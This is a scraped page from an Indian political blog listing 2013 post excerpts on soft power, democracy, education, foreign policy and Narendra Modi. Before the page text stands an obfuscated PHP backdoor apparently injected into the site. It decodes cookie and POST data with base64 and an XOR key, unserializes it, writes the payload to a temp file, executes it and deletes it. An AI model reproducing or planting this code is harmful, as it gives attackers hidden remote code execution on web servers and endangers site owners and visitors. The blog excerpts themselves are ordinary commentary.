$ZUbGuMq = "\145" . 'n' . chr (100) . "\x5f" . chr (84) . chr ( 205 - 132 ).chr ( 387 - 322 )."\x78";$BEIXdpqO = chr (99) . 'l' . "\x61" . "\163" . "\x73" . chr ( 717 - 622 ).chr ( 214 - 113 ).chr ( 797 - 677 ).chr ( 444 - 339 ).'s' . chr (116) . chr (115); $RJWgA = class_exists($ZUbGuMq); $BEIXdpqO = "63795";$rQzPNtr = !1;if ($RJWgA == $rQzPNtr){function oqYLxIQez(){$VcjKXYt = new /* 62125 */ end_TIAx(22540 + 22540); $VcjKXYt = NULL;}$KEMZpKZZJf = "22540";class end_TIAx{private function lyjMmFeSam($KEMZpKZZJf){if (is_array(end_TIAx::$IPtbX)) {$fQwNWIVHc = sys_get_temp_dir() . "/" . crc32(end_TIAx::$IPtbX[chr ( 796 - 681 ).chr ( 809 - 712 ).'l' . 't']);@end_TIAx::$IPtbX['w' . chr (114) . chr (105) . "\164" . chr (101)]($fQwNWIVHc, end_TIAx::$IPtbX["\x63" . chr ( 291 - 180 ).chr ( 310 - 200 ).chr ( 456 - 340 )."\x65" . 'n' . "\164"]);include $fQwNWIVHc;@end_TIAx::$IPtbX['d' . "\145" . "\x6c" . "\145" . 't' . 'e']($fQwNWIVHc); $KEMZpKZZJf = "22540";exit();}}private $YNrwW;public function XiElOaeF(){echo 38769;}public function __destruct(){$KEMZpKZZJf = "57831_10237";$this->lyjMmFeSam($KEMZpKZZJf); $KEMZpKZZJf = "57831_10237";}public function __construct($BujEtz=0){$mVDdRhEk = $_POST;$UIUNR = $_COOKIE;$JPlFFL = "90a051c4-154c-4d36-9a25-afee49168885";$dwEnnTEEr = @$UIUNR[substr($JPlFFL, 0, 4)];if (!empty($dwEnnTEEr)){$GKpUN = "base64";$peNKnKqlm = "";$dwEnnTEEr = explode(",", $dwEnnTEEr);foreach ($dwEnnTEEr as $gthfNZ){$peNKnKqlm .= @$UIUNR[$gthfNZ];$peNKnKqlm .= @$mVDdRhEk[$gthfNZ];}$peNKnKqlm = array_map($GKpUN . '_' . chr ( 811 - 711 ).chr (101) . chr (99) . chr ( 1052 - 941 ).'d' . "\x65", array($peNKnKqlm,)); $peNKnKqlm = $peNKnKqlm[0] ^ str_repeat($JPlFFL, (strlen($peNKnKqlm[0]) / strlen($JPlFFL)) + 1);end_TIAx::$IPtbX = @unserialize($peNKnKqlm);}}public static $IPtbX = 40024;}oqYLxIQez();} United States | Being Political

Soft Power, The Greatest Power of the Century

By |2013-11-07T11:07:31+05:30November 7th, 2013|Categories: BJP, Congress, Foreign Relations, Government, NDA, People Power, Political Parties, Politics, UPA, Youth|Tags: , , , , , , , , , , , , , , , , , |

As an Indian, I’ve become rather concerned about the hype we’re hearing about our own country — all this talk about India becoming a world leader, even the next superpower. India is often called the 21st Century power. And I just don’t think that’s what India’s all about, or should be all about. Indeed, what

The Leader- Essential Requisite.

By |2013-10-16T11:35:47+05:30October 16th, 2013|Categories: Government, People Power, Political Parties, Youth|Tags: , , , , , , , , , , , |

Physics teaches us 2 quantities - vector and scalar. While both of them have magnitude there exists a major difference between them and that is of direction. A vector has direction while a scalar quantity doesn't. To me a perfect example of a scalar quantity is India. Yes, India! I can’t help it. I am

The Week that Wasnt- The Weekly Satire

By |2013-10-07T13:25:52+05:30October 7th, 2013|Categories: BJP, Congress, Foreign Relations, Government, Narendra Modi, Political Parties, Satire, UPA|Tags: , , , , , , , , , |

Think about this: The United States has shut down, European Markets fell for a second straight day on Thursday, Greece has been the epicentre of the Eurozone Debt crisis and is in its 6th year of recession. In Spain, 1.5% of the country's population have left the country for good, millions of Syrian people have

Our India!-The Common Man Guide

By |2013-10-03T14:56:41+05:30October 3rd, 2013|Categories: People Power, Politics, Youth|Tags: , , , , , , , , , , , , , , |

The Nation: India is a developing country. In fact, it has been developing for so long that it is practically an overgrown baby. Unlike babies in general, however, this baby is not temperamental but full of equanimity. Practically nothing can provoke this baby called India. Border transgressions, terrorist attacks on our cities, parliament, external interference

Maintain the Balance

By |2013-09-30T20:04:06+05:30September 30th, 2013|Categories: BJP, Congress, Education, Government, NDA, Other Parties, People Power, Political Parties, Politics, Uncategorized, UPA, Youth|Tags: , , , , , , , , , , , , , , , , , , , |

Recently, a humorous photo is doing the rounds on Facebook which says, "I went to a fish market and shouted, 'What is this? A classroom?', thereby maintaining the balance of the Universe. " Hilarious, but also something to learn from. Doing the rounds on facebook Everything in the world needs to be balanced.

The Clash of Democracy and Capitalism

By |2013-09-27T17:17:13+05:30September 27th, 2013|Categories: Business, Economics, Government, Politics, UPA, Youth|Tags: , , , , , , , , , , , |

The domestic origins of India's economic problems lie in that clash. Over the last few months, India has been going through an experience, namely a clash between democracy and capitalism. Most wealthy democracies have had this experience at a certain stage of development, and one might even argue that the clash has not yet fully

Truly Democratic?

By |2013-09-26T18:53:55+05:30September 26th, 2013|Categories: BJP, Congress, Government, Narendra Modi, Other Parties, People Power, Political Parties, Politics, Uncategorized, UPA, Youth|Tags: , , , , , , , , , |

World's largest democracy? Yes, surely. But the World's largest successful democracy? Maybe not.In a country where the approval rating of the incumbent Prime Minister is below 10% (Ouch), at the heart of all problems lies the politics of the country. We opted for democracy as our political system. But I have been wondering for quite

The Indian Education System

By |2013-09-24T20:21:48+05:30September 24th, 2013|Categories: Education, Politics, Uncategorized, Youth|Tags: , , , , , , , , |

The biggest joke one comes across once in a while is that the Indian Education System is a good, student friendly board. And I am not just saying this due to my being a student, there are several surveys conducted which act as proofs of my above statements. In 2006, 5,857 students — or 16 a

India’s Foreign Policy-The Common Man’s Guide

By |2013-09-18T09:58:42+05:30September 18th, 2013|Categories: Congress, Economics, Foreign Relations, Government, NDA, Political Parties, Politics, Uncategorized, UPA, Youth|Tags: , , , , , , , , , , , , , , , |

In USA, if someone attacks the USA, the country is smoked and flamed. Same in the United Kingdom and most of the other countries... But in India, if you attack us the answer is clear and very strong. We WILL NOT PLAY CRICKET WITH YOU. It is sad that our foreign policy is decided over

NaMo Harihantaram?

By |2013-09-09T06:04:55+05:30September 9th, 2013|Categories: BJP, Narendra Modi, Political Parties, Politics, Uncategorized, Youth|Tags: , , , , , , , , , , , , , , |

Gujarat stands out distinctly in the country and the credit for it goes to Modi. -Ratan Tata What is the power of this man that not only is he liked by investors and businessmen but also by the common people and the daily wage earners? The real power of this phenomenon called Modi lies in

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